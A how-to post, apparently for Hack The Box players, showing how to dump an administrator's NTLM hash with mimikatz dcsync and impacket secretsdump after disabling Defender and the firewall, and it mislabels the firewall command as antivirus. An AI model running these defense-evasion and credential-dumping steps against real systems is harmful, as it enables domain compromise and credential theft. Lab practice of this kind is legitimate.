[How-To] Extract NTLM hash

Preface: If you want to decrypt a writeup for an active windows box on HTB or from other plattforms using the NTLM hash of the administartor user, you are on the right place. In this How-To post I will show you how you can extract the NTLM hash of the administrator user (probably for any user) on windows machines.

At first we will use mimikatz. In the second example I show you how to use secretdump for it.

Using mimikatz

After getting a shell as administrator you can follow the steps below to extract the NTLM hash.

First disable the real time protection if its enabled:

Set-MpPreference -DisableRealtimeMonitoring $true

Then disable the Anti-Virus protection:

netsh advfirewall set  currentprofile state off

Then run mimikatz with the following arguments:

./mimikatz.exe "lsadump::dcsync /user:administrator"

You will get an output like this:

C:\tmp> ./mimikatz.exe "lsadump::dcsync /user:administrator"

  .#####.   mimikatz 2.2.0 (x86) #18362 Feb  8 2020 12:26:09
   .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
    ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
     ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
      '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
        '#####'        > http://pingcastle.com / http://mysmartlogon.com   ***/

        mimikatz(commandline) # lsadump::dcsync /user:administrator
        [DC] 'domain.LOCAL' will be the domain
        [DC] 'machine.domain.LOCAL' will be the DC server
        [DC] 'administrator' will be the user account

        Object RDN           : Administrator

        ** SAM ACCOUNT **

        SAM Username         : Administrator
        Account Type         : 30000000 ( USER_OBJECT )
        User Account Control : 00010200 ( NORMAL_ACCOUNT DONT_EXPIRE_PASSWD )
        Account expiration   : 
        Password last change : 1/24/2020 9:14:15 AM
        Object Security ID   : S-1-5-21-2966785786-3096785034-1186376766-500
        Object Relative ID   : 500

        Credentials:
          Hash NTLM: f9485863c1e9e05851ab40cbb5ab9dff

And the NTLM hash we got is f9485863c1e9e05851ab40cbb5ab9dff. Just copy paste it in the writeup where it is asked for.

Using Secretdump

If you have owned a machine and you have the password of the user administrator, you can get the NTLM hash using secrectdump. Secretdump is a tool from impacket-tools.

secretsdump.py -just-dc-ntlm domain.local/Administrator:"Mypass"@10.10.10.X
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:d9485863c1b9e07543aa40cbb4ab9dfd:::

The hash is divided into two sections, first the LM hash and second one is NTLM.

Here we got the NTLM hash which is d9485863c1b9e07543aa40cbb4ab9dfd. Just copy paste it in the writeup where it is asked for.